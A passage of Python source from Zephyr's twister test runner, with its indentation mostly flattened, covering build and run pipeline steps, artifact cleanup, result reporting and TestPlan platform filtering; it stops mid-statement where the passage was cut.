self.instance = instance
self.testplan = tplan
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
self.suite_name_check = kwargs.get('suite_name_check', True)
self.seed = kwargs.get('seed', 0)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testsuite.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "armfvp":
instance.handler = BinaryHandler(instance, "armfvp")
instance.handler.call_make_run = True
elif instance.platform.simulation == "xt-sim":
instance.handler = BinaryHandler(instance, "xt-sim")
instance.handler.call_make_run = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
instance.handler.suite_name_check = self.suite_name_check
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
# Here we check the runtime filter results coming from running cmake
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "filtered"
self.instance.reason = "runtime filter"
results.skipped_runtime += 1
self.instance.add_missing_testscases("skipped")
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
if self.instance.status == "skipped":
results.skipped_runtime += 1
self.instance.add_missing_testscases("skipped", self.instance.reason)
if res.get('returncode', 1) > 0:
self.instance.add_missing_testscases("blocked", self.instance.reason)
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "gather_metrics", "test": self.instance})
elif op == "gather_metrics":
self.gather_metrics(self.instance)
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.testplan = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed"]:
if instance.status == "error":
results.error += 1
else:
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testsuite.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status in ["skipped", "filtered"]:
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
results.skipped_configs += 1
results.skipped_cases += len(instance.testsuite.testcases)
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
results.passed += 1
for case in instance.testcases:
if case.status == 'skipped':
results.skipped_cases += 1
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status in ["skipped", "filtered"]:
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.execution_time
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
if ( instance.status in ["error", "failed", "timeout", "flash_error"]
and hasattr(self.instance.handler, 'seed')
and self.instance.handler.seed is not None ):
more_info += "/seed: " + str(self.seed)
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done + results.skipped_filter, total_tests_width, total_to_do , instance.platform.name,
instance.testsuite.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done + results.skipped_filter) / total_to_do) * 100)
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done + results.skipped_filter,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if results.skipped_configs > 0 else Fore.RESET,
results.skipped_filter + results.skipped_runtime,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testsuite.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testsuite_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testsuite_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
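    # Illustrative example of the OVERLAY_CONFIG merging done above, with
    # hypothetical arguments:
    #
    #     args = ["OVERLAY_CONFIG=first.conf", "CONF_FILE=prj.conf",
    #             "OVERLAY_CONFIG=second.conf"]
    #     overlays = extract_overlays(args)
    #     # args is now ["CONF_FILE=prj.conf"]
    #     # overlays is ["first.conf", "second.conf"]
    #
    # The collected overlays (plus twister/testsuite_extra.conf, if present) are
    # re-added as a single OVERLAY_CONFIG="..." argument so the build sees one
    # space-separated list.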
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.testplan = self.testplan
            if self.seed is not None and instance.platform.name.startswith("native_posix"):
                self.parse_generated()
                if ('CONFIG_FAKE_ENTROPY_NATIVE_POSIX' in self.defconfig and
                        self.defconfig['CONFIG_FAKE_ENTROPY_NATIVE_POSIX'] == 'y'):
                    instance.handler.seed = self.seed
instance.handler.handle()
sys.stdout.flush()
def gather_metrics(self, instance):
if self.testplan.enable_size_report and not self.testplan.cmake_only:
self.calc_one_elf_size(instance)
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.execution_time
class TestPlan(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
ts_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testsuite-schema.yaml"))
quarantine_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "quarantine-schema.yaml"))
testsuite_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"modules": {"type": "list", "default": []},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"testcases": {"type": "list", "default": []},
"platform_type": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}},
"seed": {"type": "int", "default": 0}
}
SAMPLE_FILENAME = 'sample.yaml'
TESTSUITE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testsuite_roots=[], outdir=None):
self.roots = testsuite_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Test Plan Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.detailed_skipped_report = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
self.quarantine_verify = False
self.retry_build_errors = False
self.suite_name_check = True
self.seed = 0
# Keep track of which test cases we've filtered out and why
self.testsuites = {}
self.quarantine = {}
self.platforms = []
self.platform_names = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
# used during creating shorter build paths
self.link_dir_counter = 0
self.pipeline = None
self.version = "NA"
self.modules = []
self.timestamp = datetime.now().isoformat()
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12", "--always"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + os.sep)}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None):
for instance in self.instances.values():
results.cases += len(instance.testsuite.testcases)
if instance.status == 'filtered':
results.skipped_filter += 1
results.skipped_configs += 1
elif instance.status == 'passed':
results.passed += 1
results.done += 1
elif instance.status == 'error':
results.error += 1
results.done += 1
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
jt = json.load(fp)
for ts in jt.get("testsuites", []):
d = {}
for m, _, _ in interesting_metrics:
d[m] = ts.get(m, 0)
ts_name = ts.get('name')
ts_platform = ts.get('platform')
saved_metrics[(ts_name, ts_platform)] = d
for instance in self.instances.values():
mkey = (instance.testsuite.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
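    # Worked example of the delta computation above (numbers are hypothetical):
    # if the saved report lists ram_size=2000 for an instance and the current
    # run measured 2100, the appended tuple is
    # (instance, "ram_size", 2100, 100, True). footprint_reports() then derives
    # a relative change of 100 / (2100 - 100) = 5% and compares it against the
    # footprint_threshold argument.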
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testsuite.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
# FIXME: need a better way to identify executed tests
handler_time = instance.metrics.get('handler_time', 0)
if float(handler_time) > 0:
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed + results.error,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
built_only = results.total - run - results.skipped_configs
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{built_only}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, platform_reports):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
json_file = filename + ".json"
self.json_report(json_file, version=self.version)
self.xunit_report(json_file, filename + ".xml", full_report=False)
self.xunit_report(json_file, filename + "_report.xml", full_report=True)
self.xunit_report_suites(json_file, filename + "_suite_report.xml")
if platform_reports:
self.target_report(json_file, outdir, suffix)
def target_report(self, json_file, outdir, suffix):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(json_file, filename, platform, full_report=True)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
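            # Board descriptors typically live at <board_root>/<arch>/<board>/<board>.yaml,
            # which is what the three-level glob below matches (illustrative layout).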
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
self.platform_names = [p.name for p in self.platforms]
def get_all_tests(self):
testcases = []
for _, ts in self.testsuites.items():
for case in ts.testcases:
testcases.append(case)
return testcases
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/modules/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError(f"E: {result['returnmsg']}")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testsuites(self, testsuite_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, _, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTSUITE_FILENAME in filenames:
filename = self.TESTSUITE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
ts_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(ts_path, self.ts_schema)
parsed_data.load()
ts_path = os.path.dirname(ts_path)
workdir = os.path.relpath(ts_path, root)
for name in parsed_data.tests.keys():
ts = TestSuite(root, workdir, name)
ts_dict = parsed_data.get_test(name, self.testsuite_valid_keys)
ts.source_dir = ts_path
ts.yamlfile = ts_path
ts.type = ts_dict["type"]
ts.tags = ts_dict["tags"]
ts.extra_args = ts_dict["extra_args"]
ts.extra_configs = ts_dict["extra_configs"]
ts.arch_allow = ts_dict["arch_allow"]
ts.arch_exclude = ts_dict["arch_exclude"]
ts.skip = ts_dict["skip"]
ts.platform_exclude = ts_dict["platform_exclude"]
ts.platform_allow = ts_dict["platform_allow"]
ts.platform_type = ts_dict["platform_type"]
ts.toolchain_exclude = ts_dict["toolchain_exclude"]
ts.toolchain_allow = ts_dict["toolchain_allow"]
ts.ts_filter = ts_dict["filter"]
ts.timeout = ts_dict["timeout"]
ts.harness = ts_dict["harness"]
ts.harness_config = ts_dict["harness_config"]
if ts.harness == 'console' and not ts.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
ts.build_only = ts_dict["build_only"]
ts.build_on_all = ts_dict["build_on_all"]
ts.slow = ts_dict["slow"]
ts.min_ram = ts_dict["min_ram"]
ts.modules = ts_dict["modules"]
ts.depends_on = ts_dict["depends_on"]
ts.min_flash = ts_dict["min_flash"]
ts.extra_sections = ts_dict["extra_sections"]
ts.integration_platforms = ts_dict["integration_platforms"]
ts.seed = ts_dict["seed"]
testcases = ts_dict.get("testcases", [])
if testcases:
for tc in testcases:
ts.add_testcase(name=f"{name}.{tc}")
else:
ts.parse_subcases(ts_path)
if testsuite_filter:
if ts.name and ts.name in testsuite_filter:
self.testsuites[ts.name] = ts
else:
self.testsuites[ts.name] = ts
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (ts_path, e))
self.load_errors += 1
return len(self.testsuites)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_quarantine(self, file):
"""
        Load the quarantine list from the given yaml file and create a dictionary
        of all test configurations (platform.scenario: comment) that shall be
        skipped due to quarantine.
"""
# Load yaml into quarantine_yaml
quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)
# Create quarantine_list with a product of the listed
# platforms and scenarios for each entry in quarantine yaml
quarantine_list = []
for quar_dict in quarantine_yaml:
if quar_dict['platforms'][0] == "all":
plat = self.platform_names
else:
plat = quar_dict['platforms']
comment = quar_dict.get('comment', "NA")
quarantine_list.append([{".".join([p, s]): comment}
for p in plat for s in quar_dict['scenarios']])
# Flatten the quarantine_list
quarantine_list = [it for sublist in quarantine_list for it in sublist]
# Change quarantine_list into a dictionary
for d in quarantine_list:
self.quarantine.update(d)
def load_from_file(self, file, filter_platform=[]):
with open(file, "r") as json_test_plan:
jtp = json.load(json_test_plan)
instance_list = []
for ts in jtp.get("testsuites", []):
logger.debug(f"loading {ts['name']}...")
testsuite = ts["name"]
platform = self.get_platform(ts["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testsuites[testsuite], platform, self.outdir)
if ts.get("run_id"):
instance.run_id = ts.get("run_id")
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.metrics['handler_time'] = ts.get('execution_time', 0)
instance.metrics['ram_size'] = ts.get("ram_size", 0)
instance.metrics['rom_size'] = ts.get("rom_size",0)
status = ts.get('status', None)
reason = ts.get("reason", "Unknown")
if status in ["error", "failed"]:
instance.status = None
instance.reason = None
# test marked as passed (built only) but can run when
# --test-only is used. Reset status to capture new results.
elif status == 'passed' and instance.run and self.test_only:
instance.status = None
instance.reason = None
else:
instance.status = status
instance.reason = reason
for tc in ts.get('testcases', []):
identifier = tc['identifier']
tc_status = tc.get('status', None)
tc_reason = None
# we set reason only if status is valid, it might have been
# reset above...
if instance.status:
tc_reason = tc.get('reason')
if tc_status:
case = instance.set_case_status_by_name(identifier, tc_status, tc_reason)
case.duration = tc.get('execution_time', 0)
if tc.get('log'):
case.output = tc.get('log')
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testsuite_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
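        # Platform scope selection: --all overrides any platform filter; with no explicit
        # platform or emulation-only filter we fall back to the per-board default platforms.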
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
self.verify_platforms_existence(platform_filter, f"platform_filter")
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testsuite list...")
for ts_name, ts in self.testsuites.items():
if ts.build_on_all and not platform_filter:
platform_scope = self.platforms
elif ts.integration_platforms and self.integration:
self.verify_platforms_existence(
ts.integration_platforms, f"{ts_name} - integration_platforms")
platform_scope = list(filter(lambda item: item.name in ts.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
integration = self.integration and ts.integration_platforms
# If there isn't any overlap between the platform_allow list and the platform_scope
# we set the scope to the platform_allow list
if ts.platform_allow and not platform_filter and not integration:
self.verify_platforms_existence(
ts.platform_allow, f"{ts_name} - platform_allow")
a = set(platform_scope)
b = set(filter(lambda item: item.name in ts.platform_allow, self.platforms))
c = a.intersection(b)
if not c:
platform_scope = list(filter(lambda item: item.name in ts.platform_allow, \
self.platforms))
# list of instances per testsuite, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(ts, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if ts.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (ts.type == "unit"):
# Discard silently
continue
if ts.modules and self.modules:
if not set(ts.modules).issubset(set(self.modules)):
discards[instance] = discards.get(instance, f"one or more required module not available: {','.join(ts.modules)}")
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and ts.integration_platforms and plat.name not in ts.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if ts.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not ts.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testsuite tag filter")
if exclude_tag and ts.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testsuite exclude filter")
if testsuite_filter and ts_name not in testsuite_filter:
discards[instance] = discards.get(instance, "TestSuite name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testsuite arch filter")
if not force_platform:
if ts.arch_allow and plat.arch not in ts.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if ts.arch_exclude and plat.arch in ts.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if ts.platform_exclude and plat.name in ts.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if ts.toolchain_exclude and toolchain in ts.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if ts.platform_allow and plat.name not in ts.platform_allow:
